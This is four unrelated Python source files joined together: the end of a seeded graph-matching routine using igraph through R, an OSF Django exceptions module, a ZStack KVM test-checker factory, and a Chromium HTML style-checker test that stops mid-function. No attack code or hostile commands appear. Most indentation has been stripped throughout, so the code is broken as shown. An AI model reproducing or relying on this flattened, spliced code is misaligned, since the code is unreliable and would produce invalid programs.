    # the same number of nodes. The initial version of SGM in igraph required the same cardinality between
    # node sets. This has since been relaxed, but this step is included just in case.
ga_num_nodes = len(ga.nodes())
gb_num_nodes = len(gb.nodes())
ga_larger_count = ga_num_nodes - gb_num_nodes
print "graph a is larger by: ", ga_larger_count, ' nodes'
if ga_larger_count > 0:
addNodesToGraph(gb,abs(ga_larger_count))
else:
addNodesToGraph(ga,abs(ga_larger_count))
# now both should have the same cardinality
print nx.info(ga)
print nx.info(gb)
num_nodes = len(ga.nodes())
num_seeds = len(seed_obj)
# get integer node labels
gan = nx.convert_node_labels_to_integers(ga)
gbn = nx.convert_node_labels_to_integers(gb)
# now make separate lists of seeds for each graph
ga_seeds = []
gb_seeds = []
for seed in seed_obj:
ga_seeds.append(seed['ga'])
gb_seeds.append(seed['gb'])
print "seed_obj:"
print seed_obj
print "ga_seeds:"
print ga_seeds
print "gb_seeds:"
print gb_seeds
# re-arrange the graphs so the seeds are the first nodes in the graph and will be the lowest
# indices in the adjacency matrix
ga_substitutions = rearrangeGraphWithSeeds(gan,ga_seeds)
gb_substitutions = rearrangeGraphWithSeeds(gbn,gb_seeds)
print '----- substitutions ga -----'
print ga_substitutions
print '----- substitutions gb -----'
print gb_substitutions
print 'Graph A with seeds:'
for n in gan.nodes():
print n, gan.node[n]
print 'Graph B with seeds:'
for n in gbn.nodes():
print n, gbn.node[n]
    # temporarily write the graphs out (which preserves node order) so they can be read back in on the igraph
    # side. This is probably unnecessary, but it was done in the initial prototypes, so it is preserved here.
A_adj = np.array(nx.to_numpy_matrix(gan))
B_adj = np.array(nx.to_numpy_matrix(gbn))
# Writing graphs for testing purposes
nx.write_gml(gan,"/tmp/gan_seeds.gml")
nx.write_gml(gbn,"/tmp/gbn_seeds.gml")
#robjects.r("gA <- read.graph('/tmp/gan_seeds.gml',format='graphML')")
#robjects.r("gB <- read.graph('/tmp/gbn_seeds.gml',format='graphML')")
# convert to an adjacency matrix for the SGM algorithm
#robjects.r("matA <- as.matrix(A_adj)")
#robjects.r("matB <- as.matrix(B_adj)")
robjects.r.assign("matA", A_adj)
robjects.r.assign("matB", B_adj)
#print robjects.r("gA")
#print robjects.r("gB")
# initialize the start matrix. This is set to uniform values initially, but I think this is
# somewhat sensitive to data values
number_of_nonseed_nodes = num_nodes - num_seeds
# start with a completely uniform start matrix
commandstring = 'startMatrix = matrix( 1/'+str(number_of_nonseed_nodes)+', '+str(number_of_nonseed_nodes)+','+str(number_of_nonseed_nodes)+')'
print 'executing: ',commandstring
robjects.r(commandstring)
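    # Illustrative example: with 3 non-seed nodes the command built above is
    # 'startMatrix = matrix( 1/3, 3,3)', i.e. a 3x3 R matrix with every entry 1/3.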
# run SGM on the two adjacency matrices
commandstring = 'P <- match_vertices(matA,matB,m='+str(num_seeds)+',start=startMatrix,100)'
print 'executing: ',commandstring
robjects.r(commandstring)
# pull graph match results back from igraph
result = robjects.r('P$corr')
#print robjects.r('P$D')
#print robjects.r('P$P')
#print 'result copied to python:'
#print result
sizeP = robjects.r('nrow(P$P)')
    # copy results into a new 'matching list' that relates the two networks using the results discovered by SGM. Since the graph was re-arranged
    # for the seeds before going into SGM, we need to use the ID field from each node so the matches line up with the networks in the calling application.
print 'number of matches returned:',sizeP
print sizeP[0]
matches = []
# copy over the match for the seeds
for index in range(num_seeds):
record = {'ga': gan.node[index]['id'], 'gb': gbn.node[index]['id'],}
matches.append(record)
print index, gan.node[index], gbn.node[index]
# now copy over the links returned from SGM
for index in range(0,number_of_nonseed_nodes):
mappedNode = findCorrelatedNode(number_of_nonseed_nodes,num_seeds,index)
if (mappedNode>0 and ('id' in gan.node[index+num_seeds]) and ('id' in gbn.node[mappedNode])):
print index+num_seeds,mappedNode,gan.node[index+num_seeds],gbn.node[mappedNode]
record = {'ga': gan.node[index+num_seeds]['id'], 'gb': gbn.node[mappedNode]['id']}
matches.append(record)
print 'matches:',matches
# Create an empty response object, then add the output data
response = {}
response['result'] = {}
response['result']['matches'] = matches
# Return the response object.
return json.dumps(response)
|
|
import contextlib
from django.core.exceptions import ValidationError as DjangoValidationError
# Remnants from MODM days
# TODO: Remove usages of aliased Exceptions
ValidationError = DjangoValidationError
ValidationValueError = DjangoValidationError
ValidationTypeError = DjangoValidationError
class TokenError(Exception):
pass
class TokenHandlerNotFound(TokenError):
def __init__(self, action, *args, **kwargs):
super(TokenHandlerNotFound, self).__init__(*args, **kwargs)
self.action = action
class UnsupportedSanctionHandlerKind(Exception):
pass
class OSFError(Exception):
"""Base class for exceptions raised by the Osf application"""
pass
class NodeError(OSFError):
"""Raised when an action cannot be performed on a Node model"""
pass
class NodeStateError(NodeError):
"""Raised when the Node's state is not suitable for the requested action
Example: Node.remove_node() is called, but the node has non-deleted children
"""
pass
class UserStateError(OSFError):
"""Raised when the user's state is not suitable for the requested action
Example: user.gdpr_delete() is called, but the user has resources that cannot be deleted.
"""
pass
class SanctionTokenError(TokenError):
"""Base class for errors arising from the user of a sanction token."""
pass
class MaxRetriesError(OSFError):
"""Raised when an operation has been attempted a pre-determined number of times"""
pass
class InvalidSanctionRejectionToken(TokenError):
"""Raised if a Sanction subclass disapproval token submitted is invalid
or associated with another admin authorizer
"""
message_short = 'Invalid Token'
message_long = 'This disapproval link is invalid. Are you logged into the correct account?'
class InvalidSanctionApprovalToken(TokenError):
"""Raised if a Sanction subclass approval token submitted is invalid
or associated with another admin authorizer
"""
message_short = 'Invalid Token'
message_long = 'This approval link is invalid. Are you logged into the correct account?'
class InvalidTagError(OSFError):
"""Raised when attempting to perform an invalid operation on a tag"""
pass
class TagNotFoundError(OSFError):
"""Raised when attempting to perform an operation on an absent tag"""
pass
class UserNotAffiliatedError(OSFError):
"""Raised if a user attempts to add an institution that is not currently
one of its affiliations.
"""
message_short = 'User not affiliated'
message_long = 'This user is not affiliated with this institution.'
@contextlib.contextmanager
def reraise_django_validation_errors():
"""Context manager to reraise DjangoValidationErrors as `osf.exceptions.ValidationErrors` (for
MODM compat).
"""
try:
yield
except DjangoValidationError as err:
raise ValidationError(*err.args)
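# Usage sketch (illustrative; assumes `node` is a Django model instance):
#
#   with reraise_django_validation_errors():
#       node.full_clean()  # a DjangoValidationError surfaces as osf.exceptions.ValidationError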
class NaiveDatetimeException(Exception):
pass
class InvalidTriggerError(Exception):
def __init__(self, trigger, state, valid_triggers):
self.trigger = trigger
self.state = state
self.valid_triggers = valid_triggers
self.message = 'Cannot trigger "{}" from state "{}". Valid triggers: {}'.format(trigger, state, valid_triggers)
super(Exception, self).__init__(self.message)
class InvalidTransitionError(Exception):
def __init__(self, machine, transition):
self.message = 'Machine "{}" received invalid transitions: "{}" expected but not defined'.format(machine, transition)
class PreprintError(OSFError):
"""Raised when an action cannot be performed on a Preprint model"""
pass
class PreprintStateError(PreprintError):
"""Raised when the Preprint's state is not suitable for the requested action"""
pass
class DraftRegistrationStateError(OSFError):
"""Raised when an action cannot be performed on a Draft Registration model"""
pass
class PreprintProviderError(PreprintError):
"""Raised when there is an error with the preprint provider"""
pass
class BlockedEmailError(OSFError):
"""Raised if a user tries to register an email that is included
in the blocked domains list
"""
pass
class SchemaBlockConversionError(OSFError):
"""Raised if unexpected data breaks the conversion between the legacy
nested registration schema/metadata format and the new, flattened,
'schema block' format.
"""
pass
class SchemaResponseError(OSFError):
"""Superclass for errors ariseing from unexpected SchemaResponse behavior."""
pass
class SchemaResponseStateError(SchemaResponseError):
"""Raised when attempting to perform an operation against a
SchemaResponse with an invalid state.
"""
pass
class PreviousSchemaResponseError(SchemaResponseError):
"""Raised when attempting to create a new SchemaResponse for a parent that
already has a SchemaResponse in an unsupported state
"""
pass
class RegistrationBulkCreationRowError(OSFError):
"""Raised if a draft registration failed creation during bulk upload"""
def __init__(self, upload_id, row_id, title, external_id, draft_id=None, error=None, approval_failure=False):
# `draft_id` is provided when the draft is created but not related to the row object
self.draft_id = draft_id
# `approval_failure` determines whether the error happens during the approval process
self.approval_failure = approval_failure
# The error information for logging, sentry and email
self.error = error if error else 'Draft registration creation error'
# The short error message to be added to the error list that will be returned to the initiator via email
self.short_message = 'Title: {}, External ID: {}, Error: {}'.format(title, external_id, error)
# The long error message for logging and sentry
self.long_message = 'Draft registration creation failed: [upload_id="{}", row_id="{}", title="{}", ' \
'external_id="{}", error="{}"]'.format(upload_id, row_id, title, external_id, error)
class SchemaResponseUpdateError(SchemaResponseError):
"""Raised when assigning an invalid value (or key) to a SchemaResponseBlock."""
def __init__(self, response, invalid_responses=None, unsupported_keys=None):
self.invalid_responses = invalid_responses
self.unsupported_keys = unsupported_keys
invalid_response_message = ''
unsupported_keys_message = ''
if invalid_responses:
invalid_response_message = (
f'\nThe following responses had invalid values: {invalid_responses}'
)
if unsupported_keys:
unsupported_keys_message = (
                f'\nThe following responses had unsupported keys: {unsupported_keys}'
)
error_message = (
            f'Error updating SchemaResponse with id [{response._id}]:'
f'{invalid_response_message}{unsupported_keys_message}'
)
super().__init__(error_message)
|
|
'''
Zstack KVM Checker Factory.
@author: YYK
'''
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.header.vm as vm_header
import zstackwoodpecker.header.volume as volume_header
import zstackwoodpecker.header.image as image_header
import zstackwoodpecker.header.security_group as sg_header
import zstackwoodpecker.header.port_forwarding as pf_header
import zstackwoodpecker.header.vip as vip_header
import zstackwoodpecker.header.load_balancer as lb_header
import zstackwoodpecker.header.checker as checker_header
import zstackwoodpecker.zstack_test.zstack_checker.zstack_db_checker as db_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_vm_checker as vm_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_volume_checker as volume_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_image_checker as image_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_security_group_checker as sg_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_port_forwarding_checker as pf_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_host_checker as host_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_eip_checker as eip_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_vip_checker as vip_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_snapshot_checker as sp_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_load_balancer_checker as lb_checker
import zstackwoodpecker.test_util as test_util
import apibinding.inventory as inventory
class KvmVmCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
kvm_vm_checker_chain = checker_header.CheckerChain()
checker_dict = {}
if test_obj.state == vm_header.RUNNING:
checker_dict[vm_checker.zstack_kvm_vm_set_host_vlan_ip] = True
checker_dict[db_checker.zstack_vm_db_checker] = True
checker_dict[vm_checker.zstack_kvm_vm_running_checker] = True
            #if the VM is behind a VR
vrs = test_lib.lib_find_vr_by_vm(test_obj.vm)
if vrs:
svr_types = test_lib.lib_get_l3s_service_type(test_obj.vm)
#The first DHCP checker will wait for VM start up.
if 'DHCP' in svr_types:
checker_dict[vm_checker.zstack_kvm_vm_dhcp_checker] = True
checker_dict[vm_checker.zstack_kvm_vm_network_checker] = True
                    #if the guest can't get an IP address from DHCP, the auto case can
                    # not test the DNS feature.
if 'DNS' in svr_types:
checker_dict[vm_checker.zstack_kvm_vm_dns_checker] \
= True
else:
checker_dict[vm_checker.zstack_kvm_vm_dns_checker] \
= False
else:
checker_dict[vm_checker.zstack_kvm_vm_dhcp_checker] = False
checker_dict[vm_checker.zstack_kvm_vm_network_checker] \
= False
if 'SNAT' in svr_types:
checker_dict[vm_checker.zstack_kvm_vm_snat_checker] = True
else:
checker_dict[vm_checker.zstack_kvm_vm_snat_checker] = False
#if 'PortForwarding' in svr_types:
# checker_dict[vm_checker.zstack_kvm_vm_dnat_checker] = True
#else:
# checker_dict[vm_checker.zstack_kvm_vm_dnat_checker] = False
else:
sp_types = test_lib.lib_get_vm_l3_service_provider_types(test_obj.vm)
if 'Flat' in sp_types:
checker_dict[vm_checker.zstack_kvm_vm_ssh_no_vr_checker] = True
if test_obj.get_creation_option().get_default_l3_uuid():
checker_dict[vm_checker.zstack_kvm_vm_default_l3_checker] = True
elif test_obj.state == vm_header.STOPPED:
checker_dict[db_checker.zstack_vm_db_checker] = True
#stopped_checker is deprecated, since the stopped vm will be removed
#from host.
#checker_dict[vm_checker.zstack_kvm_vm_stopped_checker] = True
elif test_obj.state == vm_header.DESTROYED:
            #Destroying a VM will cause the vm structure to be removed from the DB when VmExpungeInterval is set to 1, so in most cases there is no need to check that the destroyed state is synced in the DB.
checker_dict[db_checker.zstack_vm_db_checker] = True
checker_dict[vm_checker.zstack_kvm_vm_destroyed_checker] = True
elif test_obj.state == vm_header.EXPUNGED:
checker_dict[db_checker.zstack_vm_db_checker] = True
kvm_vm_checker_chain.add_checker_dict(checker_dict, test_obj)
return kvm_vm_checker_chain
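    # Usage sketch (illustrative; assumes CheckerChain exposes a check() entry point,
    # which is defined outside this file):
    #
    #   chain = KvmVmCheckerFactory().create_checker(test_vm_obj)
    #   chain.check()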
class KvmVolumeCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
kvm_volume_checker_chain = checker_header.CheckerChain()
checker_dict = {}
if test_obj.state == volume_header.CREATED:
checker_dict[db_checker.zstack_volume_db_checker] = True
checker_dict[volume_checker.zstack_kvm_volume_file_checker] = False
elif test_obj.state == volume_header.ATTACHED:
checker_dict[db_checker.zstack_volume_db_checker] = True
checker_dict[volume_checker.zstack_kvm_volume_file_checker] = True
if not test_obj.target_vm.state == vm_header.DESTROYED:
checker_dict[db_checker.zstack_volume_attach_db_checker] = True
if test_obj.target_vm.state == vm_header.RUNNING:
checker_dict[volume_checker.zstack_kvm_volume_attach_checker] = True
else:
checker_dict[db_checker.zstack_volume_attach_db_checker] = False
elif test_obj.state == volume_header.DETACHED:
checker_dict[db_checker.zstack_volume_db_checker] = True
checker_dict[db_checker.zstack_volume_attach_db_checker] = False
checker_dict[volume_checker.zstack_kvm_volume_attach_checker] = False
checker_dict[volume_checker.zstack_kvm_volume_file_checker] = True
elif test_obj.state == volume_header.DELETED:
checker_dict[db_checker.zstack_volume_db_checker] = True
checker_dict[volume_checker.zstack_kvm_volume_file_checker] = True
elif test_obj.state == volume_header.EXPUNGED:
checker_dict[db_checker.zstack_volume_db_checker] = False
checker_dict[volume_checker.zstack_kvm_volume_file_checker] = False
kvm_volume_checker_chain.add_checker_dict(checker_dict, test_obj)
return kvm_volume_checker_chain
class KvmImageCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
kvm_image_checker_chain = checker_header.CheckerChain()
checker_dict = {}
if test_obj.state == image_header.CREATED:
checker_dict[db_checker.zstack_image_db_checker] = True
checker_dict[image_checker.zstack_kvm_image_file_checker] = True
if test_obj.state == image_header.DELETED:
checker_dict[db_checker.zstack_image_db_checker] = True
checker_dict[image_checker.zstack_kvm_image_file_checker] = True
if test_obj.state == image_header.EXPUNGED:
checker_dict[db_checker.zstack_image_db_checker] = False
checker_dict[image_checker.zstack_kvm_image_file_checker] = False
kvm_image_checker_chain.add_checker_dict(checker_dict, test_obj)
return kvm_image_checker_chain
class KvmSecurityGroupCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
kvm_sg_checker_chain = checker_header.CheckerChain()
checker_dict = {}
for nic_uuid in test_obj.get_all_nics():
target_vm = test_obj.get_vm_by_nic(nic_uuid)
if target_vm.state == vm_header.RUNNING:
if test_lib.lib_is_vm_sim(target_vm.vm):
kvm_sg_checker_chain.add_checker(db_checker.zstack_sg_db_checker(True), test_obj)
continue
if not test_lib.lib_is_vm_kvm(target_vm.vm):
continue
if test_obj.get_nic_tcp_ingress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_tcp_ingress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
checker = sg_checker.zstack_kvm_sg_tcp_ingress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
checker = sg_checker.zstack_kvm_sg_tcp_internal_vms_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
else:
checker = sg_checker.zstack_kvm_sg_tcp_ingress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
if test_obj.get_nic_tcp_egress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_tcp_egress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
checker = sg_checker.zstack_kvm_sg_tcp_egress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
if not test_obj.get_nic_tcp_ingress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_tcp_internal_vms_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
else:
checker = sg_checker.zstack_kvm_sg_tcp_egress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
if test_obj.get_nic_udp_ingress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_udp_ingress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
else:
checker = sg_checker.zstack_kvm_sg_udp_ingress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
if test_obj.get_nic_udp_egress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_udp_egress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
else:
checker = sg_checker.zstack_kvm_sg_udp_egress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
if test_obj.get_nic_icmp_ingress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_icmp_ingress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_ingress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_internal_vms_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
else:
checker = sg_checker.zstack_kvm_sg_icmp_ingress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
if test_obj.get_nic_icmp_egress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_icmp_egress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_egress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
#if not test_obj.get_nic_icmp_ingress_rules(nic_uuid):
# checker = sg_checker.zstack_kvm_sg_icmp_internal_vms_checker()
# checker.set_nic_uuid(nic_uuid)
# kvm_sg_checker_chain.add_checker(checker, True, test_obj)
else:
checker = sg_checker.zstack_kvm_sg_icmp_egress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
else:
#TODO: only do iptables rules check
checker = sg_checker.zstack_kvm_sg_tcp_ingress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_tcp_egress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_egress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_ingress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_udp_ingress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_udp_egress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
for test_vm in test_obj.get_detached_vm():
vm = test_vm.vm
if not test_lib.lib_is_vm_kvm(vm):
continue
checker = sg_checker.zstack_kvm_sg_tcp_ingress_exist_checker()
checker.set_vm(vm)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_tcp_egress_exist_checker()
checker.set_vm(vm)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_egress_exist_checker()
checker.set_vm(vm)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_ingress_exist_checker()
checker.set_vm(vm)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_udp_ingress_checker()
checker.set_vm(vm)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_udp_egress_checker()
checker.set_vm(vm)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
return kvm_sg_checker_chain
class KvmPortForwardingCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
kvm_pf_checker_chain = checker_header.CheckerChain()
checker_dict = {}
pf_rule = test_obj.get_port_forwarding()
if test_obj.get_state() == pf_header.ATTACHED and \
test_obj.get_target_vm().get_state() == vm_header.RUNNING:
if pf_rule.protocolType == inventory.TCP:
checker_dict[pf_checker.zstack_kvm_pf_tcp_checker] = True
if pf_rule.protocolType == inventory.UDP:
checker_dict[pf_checker.zstack_kvm_pf_rule_exist_checker] = True
elif test_obj.get_state() == pf_header.ATTACHED and test_obj.get_target_vm().get_state() == vm_header.STOPPED:
checker_dict[pf_checker.zstack_kvm_pf_vip_icmp_checker] = False
if pf_rule.protocolType == inventory.TCP:
checker_dict[pf_checker.zstack_kvm_pf_tcp_checker] = False
elif test_obj.get_state() == pf_header.DETACHED:
checker_dict[pf_checker.zstack_kvm_pf_vip_icmp_checker] = False
kvm_pf_checker_chain.add_checker_dict(checker_dict, test_obj)
return kvm_pf_checker_chain
class HostCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
host_checker_chain = checker_header.CheckerChain()
checker = host_checker.zstack_kvm_host_checker()
host_checker_chain.add_checker(checker, True, test_obj)
return host_checker_chain
class EipCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
eip_checker_chain = checker_header.CheckerChain()
checker = eip_checker.eip_checker()
eip_checker_chain.add_checker(checker, True, test_obj)
return eip_checker_chain
class VipCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
vip_checker_chain = checker_header.CheckerChain()
if test_obj.get_state() == vip_header.ATTACHED:
if test_obj.get_use_for() == vip_header.PortForwarding:
checker = vip_checker.vip_used_for_checker()
checker.set_target_use_for(vip_header.PortForwarding)
vip_checker_chain.add_checker(checker, True, test_obj)
vip_checker_chain.add_checker(vip_checker.pf_checker(), True, test_obj)
for pf in test_obj.get_pf_list_for_running_vm():
vip_checker_chain.add_checker(pf_checker.zstack_kvm_pf_rule_exist_checker(), True, pf)
for pf in test_obj.get_pf_list_for_stopped_vm():
#vip_checker_chain.add_checker(pf_checker.zstack_kvm_pf_rule_exist_checker(), True, pf)
pass
elif test_obj.get_use_for() == vip_header.Eip:
checker = vip_checker.vip_used_for_checker()
checker.set_target_use_for(vip_header.Eip)
vip_checker_chain.add_checker(checker, True, test_obj)
vip_checker_chain.add_checker(vip_checker.eip_checker(), True, test_obj)
elif test_obj.get_state() == vip_header.DETACHED:
vip_checker_chain.add_checker(vip_checker.vip_icmp_checker(), False, test_obj)
elif test_obj.get_state() == vip_header.CREATED:
vip_checker_chain.add_checker(vip_checker.vip_icmp_checker(), False, test_obj)
elif test_obj.get_state() == vip_header.DELETED:
vip_checker_chain.add_checker(vip_checker.vip_icmp_checker(), False, test_obj)
return vip_checker_chain
class SnapshotCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
sp_checker_chain = checker_header.CheckerChain()
if test_obj.get_target_volume().get_volume():
#target volume is not deleted.
sp_checker_chain.add_checker(\
sp_checker.zstack_kvm_snapshot_checker(), True, test_obj)
ps_uuid = test_obj.get_target_volume().get_volume().primaryStorageUuid
if test_lib.lib_is_ps_iscsi_backend(ps_uuid):
sp_checker_chain.add_checker(\
sp_checker.zstack_kvm_snapshot_tree_checker(), True, \
test_obj)
if test_obj.get_backuped_snapshots():
sp_checker_chain.add_checker(\
sp_checker.zstack_kvm_backuped_snapshot_checker(), \
True, test_obj)
return sp_checker_chain
class LoadBalancerCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
lb_checker_chain = checker_header.CheckerChain()
if test_obj.get_state() != lb_header.DELETED:
lb_checker_chain.add_checker(db_checker.zstack_lb_db_checker(), \
True, test_obj)
for lbl in test_obj.get_load_balancer_listeners().values():
if lbl.get_state() != lb_header.DELETED:
checker = lb_checker.zstack_kvm_lbl_checker()
checker.set_lbl(lbl)
lb_checker_chain.add_checker(checker, True, test_obj)
if test_obj.get_load_balancer_listeners():
if test_obj.is_separated_vr():
lb_checker_chain.add_checker(\
db_checker.zstack_alone_lb_vr_db_checker(),\
True, test_obj)
else:
lb_checker_chain.add_checker(\
db_checker.zstack_alone_lb_vr_db_checker(),\
False, test_obj)
else:
lb_checker_chain.add_checker(db_checker.zstack_lb_db_checker(), \
False, test_obj)
return lb_checker_chain
|
|
#!/usr/bin/env python3
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from . import html_checker
from os import path as os_path
import re
from sys import path as sys_path
from . import test_util
import unittest
_HERE = os_path.dirname(os_path.abspath(__file__))
sys_path.append(os_path.join(_HERE, '..', '..'))
from PRESUBMIT_test_mocks import MockInputApi, MockOutputApi
class HtmlCheckerTest(unittest.TestCase):
def setUp(self):
super(HtmlCheckerTest, self).setUp()
self.checker = html_checker.HtmlChecker(MockInputApi(), MockOutputApi())
def ShouldFailCheck(self, line, checker):
"""Checks that the |checker| flags |line| as a style error."""
error = checker(1, line)
self.assertNotEqual('', error, 'Should be flagged as style error: ' + line)
highlight = test_util.GetHighlight(line, error).strip()
def ShouldPassCheck(self, line, checker):
"""Checks that the |checker| doesn't flag |line| as a style error."""
error = checker(1, line)
self.assertEqual('', error, 'Should not be flagged as style error: ' + line)
def testClassesUseDashFormCheckFails(self):
lines = [
' <a class="Foo-bar" href="classBar"> ',
'<b class="foo-Bar"> ',
'<i class="foo_bar" >',
' <hr class="fooBar"> ',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.ClassesUseDashFormCheck)
def testClassesUseDashFormCheckPasses(self):
lines = [
' class="abc" ',
'class="foo-bar"',
'<div class="foo-bar" id="classBar"',
'<div class="foo $i18n{barBazQux}" id="classBar"',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.ClassesUseDashFormCheck)
def testSingleQuoteCheckFails(self):
lines = [
""" <a href='classBar'> """,
"""<a foo$="bar" href$='classBar'>""",
"""<a foo="bar" less="more" href='classBar' kittens="cats">""",
"""<a cats href='classBar' dogs>""",
"""<a cats\n href='classBat\nclassBaz'\n dogs>""",
]
for line in lines:
self.ShouldFailCheck(line, self.checker.DoNotUseSingleQuotesCheck)
def testSingleQuoteCheckPasses(self):
lines = [
"""<b id="super-valid">SO VALID!</b>""",
"""<a text$="i ain't got invalid quotes">i don't</a>""",
"""<span>[[i18n('blah')]]</span> """,
"""<a cats href="classBar" dogs>""",
"""<a cats\n href="classBar"\n dogs>""",
]
for line in lines:
self.ShouldPassCheck(line, self.checker.DoNotUseSingleQuotesCheck)
def testDoNotCloseSingleTagsCheckFails(self):
lines = [
"<input/>",
' <input id="a" /> ',
"<div/>",
"<br/>",
"<br />",
]
for line in lines:
self.ShouldFailCheck(line, self.checker.DoNotCloseSingleTagsCheck)
def testDoNotCloseSingleTagsCheckPasses(self):
lines = [
"<input>",
"<link>",
"<div></div>",
'<input text="/">',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.DoNotCloseSingleTagsCheck)
def testDoNotUseBrElementCheckFails(self):
lines = [
" <br>",
"<br > ",
"<br\>",
'<br name="a">',
]
for line in lines:
self.ShouldFailCheck(
line, self.checker.DoNotUseBrElementCheck)
def testDoNotUseBrElementCheckPasses(self):
lines = [
"br",
"br>",
"<browser-switch-app></browser-switch-app>",
"give me a break"
]
for line in lines:
self.ShouldPassCheck(
line, self.checker.DoNotUseBrElementCheck)
def testDoNotUseInputTypeButtonCheckFails(self):
lines = [
'<input type="button">',
' <input id="a" type="button" >',
'<input type="button" id="a"> ',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.DoNotUseInputTypeButtonCheck)
def testDoNotUseInputTypeButtonCheckPasses(self):
lines = [
"<input>",
'<input type="text">',
'<input type="result">',
'<input type="submit">',
"<button>",
'<button type="button">',
'<button type="reset">',
'<button type="submit">',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.DoNotUseInputTypeButtonCheck)
def testI18nContentJavaScriptCaseCheckFails(self):
lines = [
' i18n-content="foo-bar" ',
'i18n-content="foo_bar"',
'i18n-content="FooBar"',
'i18n-content="_foo"',
'i18n-content="foo_"',
'i18n-content="-foo"',
'i18n-content="foo-"',
'i18n-content="Foo"',
]
for line in lines:
